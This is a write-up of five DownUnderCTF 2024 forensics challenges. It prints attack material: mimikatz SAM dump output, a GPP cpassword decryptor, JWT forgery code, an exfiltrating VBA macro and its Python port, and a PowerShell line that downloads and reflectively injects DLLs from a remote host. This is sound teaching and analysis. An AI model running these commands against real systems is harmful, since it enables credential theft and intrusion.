DownUnderCTF 2024 - Forensics
Baby's First Forensics
They have been trying to break into our infrastructure all morning! They are after more information about our secret kangaroos! We need your help: we captured some of the traffic from their attack on us. Can you tell us which tool they used and its version?
Note: wrap your answer in DUCTF{}, e.g. DUCTF{nmap_7.25}
Attachment: capture.pcap
Nikto is a web server scanner.
DUCTF{Nikto_2.1.6}
SAM I AM
The attacker managed to get domain admin on our rebel domain controller! It looks like they used WMI to log in with an account and dumped some files.
Can you reproduce how they obtained the administrator password using the artifacts provided?
Put the Administrator account's password in DUCTF{}, e.g. DUCTF{password123!}
Attachment: samiam.zip
We are given the SAM and SYSTEM files and asked for the administrator password, so mimikatz is the obvious tool:
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
mimikatz # lsadump::sam /sam:\sam.bak /system:\system.bak
Domain : DUCTF-AD
SysKey : a88f47504785ba029e8fa532c4c9e27b
Local SID : S-1-5-21-2461790198-1013503533-1008536141
SAMKey : 848804bda5d876ca7027beeee0efdd7c
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 476b4dddbbffde29e739b618580adb1e
RID : 000001f5 (501)
User : Guest
Look up the hash 476b4dddbbffde29e739b618580adb1e on cmd5, which gives !checkerboard1
I would guess the foreign players have a site where this can be looked up without spending credits..
DUCTF{!checkerboard1}
Bad Policies
It looks like the attacker managed to gain access to the rebels' domain controller.
Can you work out how they got access, using these artifacts extracted from one of our Outpost machines?
Attachment: badpolicies.zip
Reference: https://www.cnblogs.com/404p3rs0n/p/15675872.html
Recovering passwords stored in Group Policy
Locate the configuration file Groups.xml:
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>
The attribute worth noting is cpassword, which stores the encrypted value:
B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2
It is encrypted with AES-256. Although AES-256 itself is not practically breakable, Microsoft chose to publish the AES-256 key used for this encryption:
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
With that key we can recover the plaintext.
One way to do so is the open-source PowerShell script Get-GPPPassword.ps1 by Chris Campbell (@obscuresec).
Project: https://github.com/PowerShellMafia/PowerSploit/tree/master/Exfiltration
The script runs on a domain-joined host, automatically searches the files in the \SYSVOL share and recovers every plaintext password it finds:
powershell -executionpolicy bypass -file Get-GPPPassword.ps1
Here we only need the cpassword value, so it can be decrypted directly with the following code:
#!/usr/bin/python2
import sys
from Crypto.Cipher import AES
from base64 import b64decode

if(len(sys.argv) != 2):
    print "decrypt.py <cpassword>"
    sys.exit(0)

# The AES-256 key Microsoft published for GPP cpassword values
key = """4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b""".decode('hex')
cpassword = sys.argv[1]
# cpassword is stored without base64 padding; restore it before decoding
cpassword += "=" * ((4 - len(cpassword) % 4) % 4)
password = b64decode(cpassword)
# AES-256-CBC with an all-zero IV
out = AES.new(key, AES.MODE_CBC, "\x00" * 16)
out = out.decrypt(password)
# Strip the PKCS#7 padding and decode the UTF-16 plaintext
print out[:-ord(out[-1])].decode('utf16')
DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
emuc2
Like every good nation-state, we have our own malware and C2 for offensive operations. But someone got hold of the source and used it against us! Here is a traffic capture we found on one of our laptops......
Attachments: sslkeylogfile.txt, challenge.pcap
The sslkeylogfile immediately suggests TLS.
An external application can decrypt TLS connections with a key log. Wireshark 1.6.0 and later can use this log file to decrypt the packets: tell Wireshark where the key file is via Wireshark -> Preferences -> Protocols -> TLS -> (Pre)-Master-Secret log file.
Following the TLS streams, stream 34 mentions a JWT token, which may come in handy later:
PRI * HTTP/2.0
SM
[... binary HTTP/2 frame data ...]
{"error":"Error validating JWT token - No token provided"}
Stream 23 contains a large block of encrypted data, which is suspicious. Following the HTTP/2 stream reveals the URL path /api/env, which will probably be useful as well.
Since HTTP/2 is in play, look through all of it.
We find forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/login; log in with the username and password from the capture:
{"username": "jooospeh", "password": "n3v3r-g0nna-g1v3-th3-b1rds-up"}
It says we do not have permission to view the flag, so either we find a password to log in as the admin user, or we forge an admin user's login. Recalling the JWT token seen at the start, forgery is the option to consider.
Combined with the large amount of data found under /api/env earlier, try accessing one of them at random, e.g.
https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/kMyYN2gsez9DQqovBkX4KwxRgpOAbxgb
This suggests one of those files contains the JWT secret, so save the list of paths obtained earlier.
Tidy up the list and brute-force it with the captured request.
I initially assumed they were all fake files, but after brute-forcing and checking the response lengths, many of them turned out to contain parameters. Searching for the keyword JWT locates it directly.
This gives the JWT secret:
JWT_SECRET=3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi
Generate a new JWT. The data comes from the same stream in which the login password was found:
import jwt

# Claims taken from the token seen in the login stream
data = {"subject_id": 1, "exp": 1920187883}
# Secret recovered from /api/env
JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"
# Re-sign the claims with the leaked secret, using the same HS512 algorithm
encoded = jwt.encode(data, JWT_SECRET, algorithm="HS512")
print(encoded)
After replacing the JWT token in the browser, we get the flag:
DUCTF{pǝʇɔǝɟuᴉ_sᴉ_ǝlᴉɟ_dᴉz_ǝɥʇ_oʇ_pɹoʍssɐd_ǝɥʇ}
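PyJWT does the signing above in one call, which hides what HS512 actually is. The block below is an added example, not part of the original writeup or the challenge's server: it re-implements HS512 sign and verify with only the standard library, using the leaked secret and the claims from the page, and shows why anyone holding the HMAC secret can mint claims that the server accepts (so a secret exposed through an /api/env style endpoint must be rotated, and the algorithm must be pinned server-side).

```python
import base64
import hashlib
import hmac
import json

# Secret recovered from the /api/env file above (value copied from the writeup).
JWT_SECRET = "3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi"
# Claims seen in the login stream
CLAIMS = {"subject_id": 1, "exp": 1920187883}

def b64url(raw: bytes) -> str:
    # JWT uses the URL-safe alphabet with the '=' padding stripped
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs512(claims: dict, secret: str) -> str:
    """header.payload.signature, where signature = HMAC-SHA512(secret, header.payload)."""
    header = b64url(json.dumps({"alg": "HS512", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha512).digest()
    return f"{header}.{payload}.{b64url(sig)}"

def verify_hs512(token: str, secret: str):
    """Server-side check: return the claims if the HMAC matches, otherwise None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header, payload, sig = parts
    try:
        # Pin the algorithm; never let the token choose it (blocks alg=none tricks)
        if json.loads(b64url_decode(header)).get("alg") != "HS512":
            return None
        expected = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha512).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        return json.loads(b64url_decode(payload))
    except (ValueError, UnicodeDecodeError):
        return None
```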
Macro Magic
We managed to extract this Excel spreadsheet artifact from one of our Outpost machines. Something is going on under the hood. After opening it we discovered and captured some suspicious traffic on the network. Can you work out what this traffic is and find the flag?
Note: you do not need to run or enable macros to solve this.
Attachment: macromagic.zip
Macros are mentioned, and the hint says they need not be run or enabled. Analyse the file with oledump.py, which can display macro code without executing it.
Project: https://github.com/decalage2/oledump-contrib
It requires the olefile Python module (formerly OleFileIO_PL):
pip install olefile
Usage:
┌──(root💀kali)-[~/桌面/oledump-contrib]
└─# python2 oledump.py ../Monke.xlsm
A: xl/vbaProject.bin
A1: 515 'PROJECT'
A2: 107 'PROJECTwm'
A3: M 24526 'VBA/Module1'
A4: m 1158 'VBA/Sheet1'
A5: m 985 'VBA/Sheet2'
A6: m 1158 'VBA/ThisWorkbook'
A7: 4438 'VBA/_VBA_PROJECT'
A8: 3276 'VBA/__SRP_0'
A9: 239 'VBA/__SRP_1'
A10: 434 'VBA/__SRP_2'
A11: 3988 'VBA/__SRP_3'
A12: 384 'VBA/__SRP_4'
A13: 66 'VBA/__SRP_5'
A14: 276 'VBA/__SRP_6'
A15: 66 'VBA/__SRP_7'
A16: 602 'VBA/dir'
View the macro source:
python2 oledump.py -s A3 -v ../Monke.xlsm
-s <stream>: select one of the streams listed above to view its contents
-v: decompress the VBA macro
There is a lot of junk data, such as
MDAxMTEwMDAgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMTAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTAxMTEgMDAxMTAwMTAgMDAxMDAwMDAgMDAxMTEwMDEgMDAxMTAxMTEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDAgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDAgMDAxMTAwMDEgMDAxMDAwMDAgMDAxMTAwMDEgMDAxMTAwMDEgMDAxMTAxMDA=
and some pieces that decode to FAKEFLAG{DUCTF_Fake_Flag} and the like; simply delete them.
After cleaning up, we are left with the following code:
Attribute VB_Name = "Module1"

' Repeating-key XOR of B with C (identical to doThing below)
Public Function anotherThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    anotherThing = A
End Function

' Decoy: fills column B with random numbers and bubble-sorts rows 1-5 by them
Public Function importantThing()
    Dim tempString As String
    Dim tempInteger As Integer
    Dim I As Integer
    Dim J As Integer
    For I = 1 To 5
        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)
    Next I
    For I = 1 To 5
        For J = I + 1 To 5
            If Cells(J, 2).Value < Cells(I, 2).Value Then
                tempString = Cells(I, 1).Value
                Cells(I, 1).Value = Cells(J, 1).Value
                Cells(J, 1).Value = tempString
                tempInteger = Cells(I, 2).Value
                Cells(I, 2).Value = Cells(J, 2).Value
                Cells(J, 2).Value = tempInteger
            End If
        Next J
    Next I
End Function

' Makes the byte list URL-safe: "84 114 121" -> "84-114-121"
Public Function totalyFine(A As String) As String
    Dim B As String
    B = Replace(A, " ", "-")
    totalyFine = B
End Function

Sub macro1()
    Dim Path As String
    Dim wb As Workbook
    Dim A As String
    Dim B As String
    Dim C As String
    Dim D As String
    Dim E As String
    Dim F As String
    Dim G As String
    Dim H As String
    Dim J As String
    Dim K As String
    Dim L As String
    Dim M As String
    Dim N As String
    Dim O As String
    Dim P As String
    Dim Q As String
    Dim R As String
    Dim S As String
    Dim T As String
    Dim U As String
    Dim V As String
    Dim W As String
    Dim X As String
    Dim Y As String
    Dim Z As String
    Dim I As Long
    N = importantThing()
    K = "Yes"
    S = "Mon"
    U = forensics(K)
    V = totalyFine(U)
    D = "Ma"
    J = "https://play.duc.tf/" + V
    superThing (J)
    J = "http://flag.com/"
    superThing (J)
    G = "key"
    J = "http://play.duc.tf/"
    superThing (J)
    J = "http://en.wikipedia.org/wiki/Emu_War"
    superThing (J)
    N = importantThing()
    ' Reads the flag from A1 of flag.xlsx next to this workbook
    Path = ThisWorkbook.Path & "\flag.xlsx"
    Set wb = Workbooks.Open(Path)
    Dim valueA1 As Variant
    valueA1 = wb.Sheets(1).Range("A1").Value
    MsgBox valueA1
    wb.Close SaveChanges:=False
    F = "gic"
    N = importantThing()
    Q = "Flag: " & valueA1
    H = "Try Harder"
    U = forensics(H)
    V = totalyFine(U)
    J = "http://downunderctf.com/" + V
    superThing (J)
    ' XOR key assembled from the fragments: "Mon" + "key" + "Ma" + "gic"
    W = S + G + D + F
    O = doThing(Q, W)
    M = anotherThing(O, W)
    A = something(O)
    Z = forensics(O)
    N = importantThing()
    P = "Pterodactyl"
    U = forensics(P)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
    ' Exfiltrates the XOR-encoded flag as decimal bytes in the URL path
    T = totalyFine(Z)
    MsgBox T
    J = "http://downunderctf.com/" + T
    superThing (J)
    N = importantThing()
    E = "Forensics"
    U = forensics(E)
    V = totalyFine(U)
    J = "http://play.duc.tf/" + V
    superThing (J)
End Sub

' Repeating-key XOR of B with C
Public Function doThing(B As String, C As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(B)
        A = A & Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))
    Next I
    doThing = A
End Function

' Beacon: synchronous HTTP GET to the given URL
Public Function superThing(ByVal A As String) As String
    With CreateObject("MSXML2.ServerXMLHTTP.6.0")
        .Open "GET", A, False
        .Send
        superThing = StrConv(.responseBody, vbUnicode)
    End With
End Function

' inputText is never declared, so Len(inputText) is 0 and this returns ""
Public Function something(B As String) As String
    Dim I As Long
    Dim A As String
    For I = 1 To Len(inputText)
        A = A & WorksheetFunction.Dec2Bin(Asc(Mid(B, I, 1)))
    Next I
    something = A
End Function

' Converts a string to its space-separated decimal byte values
Public Function forensics(B As String) As String
    Dim A() As Byte
    Dim I As Integer
    Dim C As String
    A = StrConv(B, vbFromUnicode)
    For I = LBound(A) To UBound(A)
        C = C & CStr(A(I)) & " "
    Next I
    C = Trim(C)
    forensics = C
End Function
A brief analysis of the main parts of the code:
- Functions anotherThing and doThing: these two perform the same operation, XORing two strings. They iterate over each character of the first string, XOR its ASCII value with the ASCII value of the character at the corresponding position in the second string (cycling through the second string), convert the result back to a character and concatenate.
- Function importantThing: generates 5 random numbers and places them in the second column of the worksheet, then sorts them and rearranges the values in the first column accordingly.
- Function totalyFine: replaces every space in the input string with a dash (-).
- Function superThing: sends a GET request to the given URL using an MSXML2.ServerXMLHTTP.6.0 object and returns the response body (converted to a Unicode string).
- Function something: converts the ASCII value of each character of the input string to a binary string and concatenates them.
- Function forensics: converts the input string to a byte array (StrConv with vbFromUnicode), then converts each byte to a string and joins them with spaces.
- Sub macro1: the main entry point. It calls the functions above to perform a series of operations: generating random numbers, sorting, replacing spaces, sending HTTP requests and converting strings. It also opens a workbook named "flag.xlsx", reads cell A1 and shows a message box. Finally it uses these values for further string operations and HTTP requests.
Have an AI refactor it into Python (ERNIE Bot did a decent job):
import requests
import os
import random
import openpyxl

def another_thing(b, c):
    # Repeating-key XOR. Python indexes from 0, so the key index is i % len(c)
    # (the VBA uses (I - 1) Mod Len(C) + 1 because its I starts at 1).
    return ''.join(chr(ord(b[i]) ^ ord(c[i % len(c)])) for i in range(len(b)))

def important_thing():
    # Decoy: fills B1:B5 with random numbers and sorts them
    wb = openpyxl.Workbook()
    ws = wb.active
    for i in range(1, 6):
        ws[f'B{i}'] = random.randint(0, 1000)
    values = [(ws[f'B{i}'].value, f'A{i}') for i in range(1, 6)]
    values.sort()
    for i, (val, cell) in enumerate(values):
        ws[cell] = i + 1
    wb.save('temp.xlsx')
    return None

def totaly_fine(a):
    return a.replace(" ", "-")

def do_thing(b, c):
    # Same repeating-key XOR as another_thing
    return ''.join(chr(ord(b[i]) ^ ord(c[i % len(c)])) for i in range(len(b)))

def super_thing(a):
    # The macro's beacon: an HTTP GET whose URL path carries the encoded data
    response = requests.get(a)
    return response.text

def something(b):
    return ''.join(format(ord(c), 'b') for c in b)

def forensics(b):
    # Space-separated decimal byte values of the string
    return ' '.join(str(byte) for byte in b.encode())

def macro1():
    important_thing()
    k = "Yes"
    s = "Mon"
    u = forensics(k)
    v = totaly_fine(u)
    d = "Ma"
    j = f"https://play.duc.tf/{v}"
    super_thing(j)
    j = "http://flag.com/"
    super_thing(j)
    g = "key"
    j = "http://play.duc.tf/"
    super_thing(j)
    j = "http://en.wikipedia.org/wiki/Emu_War"
    super_thing(j)
    important_thing()
    path = os.path.join(os.getcwd(), 'flag.xlsx')
    wb = openpyxl.load_workbook(path)
    value_a1 = wb.worksheets[0]['A1'].value  # openpyxl exposes sheets as .worksheets
    print(value_a1)
    wb.close()
    f = "gic"
    important_thing()
    q = f"Flag: {value_a1}"
    h = "Try Harder"
    u = forensics(h)
    v = totaly_fine(u)
    j = f"http://downunderctf.com/{v}"
    super_thing(j)
    w = s + g + d + f
    o = do_thing(q, w)
    m = another_thing(o, w)
    a = something(o)
    z = forensics(o)
    important_thing()
    p = "Pterodactyl"
    u = forensics(p)
    v = totaly_fine(u)
    j = f"http://play.duc.tf/{v}"
    super_thing(j)
    t = totaly_fine(z)
    print(t)
    j = f"http://downunderctf.com/{t}"
    super_thing(j)
    important_thing()
    e = "Forensics"
    u = forensics(e)
    v = totaly_fine(u)
    j = f"http://play.duc.tf/{v}"
    super_thing(j)

# Run the macro (note: this really sends the GET requests above)
macro1()
The Python version is much more readable:
w = s + g + d + f
o = do_thing(q, w)
m = another_thing(o, w)
This part is clearly doing XOR, and w should be the XOR key; go back and collect the corresponding values:
s = "Mon"
g = "key"
d = "Ma"
f = "gic"
That gives the key MonkeyMagic; now only the ciphertext is missing.
Given all the URL concatenation in the macro code, the packet capture comes in handy:
https://downunderctf.com/84-114-121-32-72-97-114-100-101-114
https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108
https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19
https://play.duc.tf/70-111-114-101-110-115-105-99-115
Trying them out, all except the third one convert from decimal to characters as Try Harder, Pterodactyl and Forensics,
so the ciphertext should be the third one; its length fits as well.
Write the decryption script:
def decode(encoded, key):
    # Repeating-key XOR over the decimal byte values taken from the URL path
    return ''.join(chr(encoded[i] ^ ord(key[(i) % len(key)])) for i in range(len(encoded)))

flag = [11, 3, 15, 12, 95, 89, 9, 52, 36, 61, 37, 54, 34, 90, 15, 86, 38, 26, 80, 19, 1, 60, 12, 38, 49, 9, 28, 38, 0, 81, 9, 2, 80, 52, 28, 19]
key = "MonkeyMagic"
decoded_message = decode(flag, key)
print(decoded_message)
Running it gives Flag: DUCTF{M4d3_W1th_AI_by_M0nk3ys}
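The script above decodes the third URL only. As an added example that is not part of the original writeup, the block below triages all four beacon URLs from the capture: it undoes forensics() and totalyFine() by turning the dash-separated decimal path back into bytes, labels each path as plain or XOR-encoded by checking for control bytes, and applies doThing()'s repeating-key XOR with the key macro1 assembles from its fragments.

```python
import re
from urllib.parse import urlsplit

# Beacon URLs observed in the capture (copied from the writeup above).
BEACONS = [
    "https://downunderctf.com/84-114-121-32-72-97-114-100-101-114",
    "https://play.duc.tf/80-116-101-114-111-100-97-99-116-121-108",
    "https://downunderctf.com/11-3-15-12-95-89-9-52-36-61-37-54-34-90-15-86-38-26-80-19-1-60-12-38-49-9-28-38-0-81-9-2-80-52-28-19",
    "https://play.duc.tf/70-111-114-101-110-115-105-99-115",
]
# The XOR key macro1 assembles as S + G + D + F.
KEY = "Mon" + "key" + "Ma" + "gic"

def path_to_bytes(url: str) -> bytes:
    """Undo forensics() + totalyFine(): '84-114-...' back into raw bytes."""
    path = urlsplit(url).path.strip("/")
    if not re.fullmatch(r"\d+(-\d+)*", path):
        raise ValueError(f"not a dash-separated byte path: {path}")
    return bytes(int(tok) for tok in path.split("-"))

def xor_with_key(data: bytes, key: str) -> bytes:
    """doThing(): repeating-key XOR, key index wrapping with the data index."""
    return bytes(b ^ ord(key[i % len(key)]) for i, b in enumerate(data))

def looks_like_text(data: bytes) -> bool:
    # Printable ASCII only; control bytes mean the path was XOR-encoded first
    return all(32 <= b < 127 for b in data)

def triage(urls, key):
    """Label each beacon 'plain' or 'xor' and return the recovered string."""
    results = []
    for url in urls:
        raw = path_to_bytes(url)
        if looks_like_text(raw):
            results.append(("plain", raw.decode("ascii")))
        else:
            results.append(("xor", xor_with_key(raw, key).decode("ascii")))
    return results
```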
Lost in Memory
It looks like one of our emu soldiers ran something on an Outpost machine, and now it is doing strange things. As a precaution we took a memory dump. Can you tell us what happened?
This challenge has four parts that combine into the final flag, with _ between each answer. Find all four answers and combine them into a flag in all lowercase letters, e.g. DUCTF{answer1_answer2_answer3_answer4}. For example: DUCTF{malicious.xlsm_invoke-mimikatz_malware.exe-malware2.exe_strong-password123}
- What is the name of the malicious executable? e.g. malicious.xlsm
- What is the name of the powershell module used? e.g. invoke-mimikatz
- What are the names of the two files executed from the malicious executable (in alphabetical order, with a - in between and no spaces)? e.g. malware.exe-malware2.exe
- What is the password of the new account created via powershell? e.g. strong-password123
Attachment: EMU-OUTPOST.zip
First identify the image profile:
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw imageinfo
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 cmdscan
The command history shows the file name monkey.doc.ps1, which is the answer to the first question.
Scrolling further down there is also:
notepad.exe pid: 3048
Command line : "C:\Windows\System32\notepad.exe" "C:\Users\emu\Downloads\monkey.doc.ps1"
Find the corresponding process ID:
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pstree
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8439a030:notepad.exe 4044 3176 3 78 2024-06-18 10:00:15 UTC+0000
Dump the process memory:
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 4044 --dump-dir=/root/桌面
From the command analysis above, monkey.doc.ps1 was run through powershell, so search for that keyword:
strings ../../4044.dmp | grep "powershell"
powershell.exe
powershell/
powershell.exe
powershell.exe
powershell.exe
powershell/
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
ly loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.
powershell $PKjAU= ") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."; .( $Env:CoMsPeC[4,24,25]-JOIn'')(-join ( gi vaRiaBlE:pKjAU).valUe[-1 .. - ( ( gi vaRiaBlE:pKjAU).valUe.leNgth) ] )
Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process.
......
This PowerShell script looks obfuscated.
I asked ERNIE Bot:
Analyse the variable assignment: first look at what is assigned to $PKjAU. Note the concatenation pattern in the string; for example 'dd'+'a/' is actually 'dda/'. Decode the string: use PowerShell to decode it. Since the string is concatenated back to front, you may need to write a PowerShell script that decodes it in reverse.
This yields 5up3r-5ecur3, the answer to the fourth question.
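Rather than running the sample to see what it does, the reversal can be undone statically. The block below is an added example, not from the writeup: it reconstructs the command from the $PKjAU value recovered above by reversing the string and joining the single-quoted fragments, and resolves the $Env:ComSpec / $ShellId index trick that spells out the invoker; nothing is executed, and the default Windows values of ComSpec and ShellId are an assumption.

```python
import re

# Value assigned to $PKjAU in the strings output above (copied from the dump).
PKJAU = r") )'dd'+'a/ n'+'i'+'mda'+' sro'+'t'+'artsinimda'+' p'+'uorglacol'+' te'+'n;d'+'d'+'a/ 3r'+'uce5-r3'+'pu'+'5'+' nimda resu '+'te'+'n'(( )'x'+]31[dIlLehs$+]1[diLLehs$ (."

def reverse_layer(obfuscated: str) -> str:
    """Undo the .valUe[-1 .. -length] trick: the whole string is stored backwards."""
    return obfuscated[::-1]

def join_literals(ps_expr: str) -> str:
    """Concatenate the single-quoted fragments of a 'a'+'b'+'c' PowerShell expression."""
    return "".join(re.findall(r"'([^']*)'", ps_expr))

def recover_command(obfuscated: str) -> str:
    """Statically recover the command string that would be handed to iex."""
    plain = reverse_layer(obfuscated)
    # The payload sits inside the inner '((' ... ')' after the invoker expression.
    inner = plain.split("((", 1)[1]
    return join_literals(inner)

def recover_invoker(comspec: str = r"C:\WINDOWS\system32\cmd.exe",
                    shellid: str = "Microsoft.PowerShell") -> tuple:
    """Resolve $Env:ComSpec[4,24,25] and $ShellId[1]+$ShellId[13]+'x' (defaults assumed)."""
    outer = "".join(comspec[i] for i in (4, 24, 25))
    inner = shellid[1] + shellid[13] + "x"
    return outer, inner

def created_account(command: str):
    """Pull (user, password) out of a 'net user <name> <pw> /add' command, if present."""
    m = re.search(r"net user (\S+) (\S+) /add", command)
    return (m.group(1), m.group(2)) if m else None
```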
So far only the first and fourth answers are known.
I found out later that vol2's consoles plugin can be used, since it gives a more detailed view of each command:
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 consoles
Notice there are two commands under powershell. Locate powershell's PID: there are several, and the correct one is 1136; if you extract 2520 instead, one DLL will be missing.
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 pslist
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ---------
0x8449c528 powershell.exe 1136 3176 17 432 1 0 2024-06-18 10:01:08 UTC+0000
0x8452f600 powershell.exe 2520 1136 11 306 1 0 2024-06-18 10:01:35 UTC+0000
Dump the powershell process:
python2 vol.py -f /root/桌面/EMU-OUTPOST.raw --profile=Win7SP1x86 memdump -p 2520 --dump-dir=/root/桌面
Convert it to text:
strings ../../1136.dmp > ../../1136.txt
Locate the keyword New-Object:
{iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/emu.dll};Start-Job -ScriptBlock {iex (New-Object net.webclient).Downloadstring('http://192.168.57.166/reflective/reflect.ps1'); Invoke-ReflectivePEInjection -PEUrl http://192.168.57.166/documents/kiwi.dll}
This mentions Invoke-ReflectivePEInjection, which shows the whole attack scenario revolves around reflective DLL injection.
So the answer to the second question is Invoke-ReflectivePEInjection, and the third is emu.dll-kiwi.dll.
Full flag: DUCTF{monkey.doc.ps1_invoke-reflectivepeinjection_emu.dll-kiwi.dll_5up3r-5ecur3}
Summary
For me the challenges were quite novel, fun as well as challenging.
I learned how to use many tools and picked up some finer points of forensic analysis.
Some writeups referenced:
https://warlocksmurf.github.io/posts/ductf2024/
https://www.youtube.com/watch?v=86IwT9UDIsk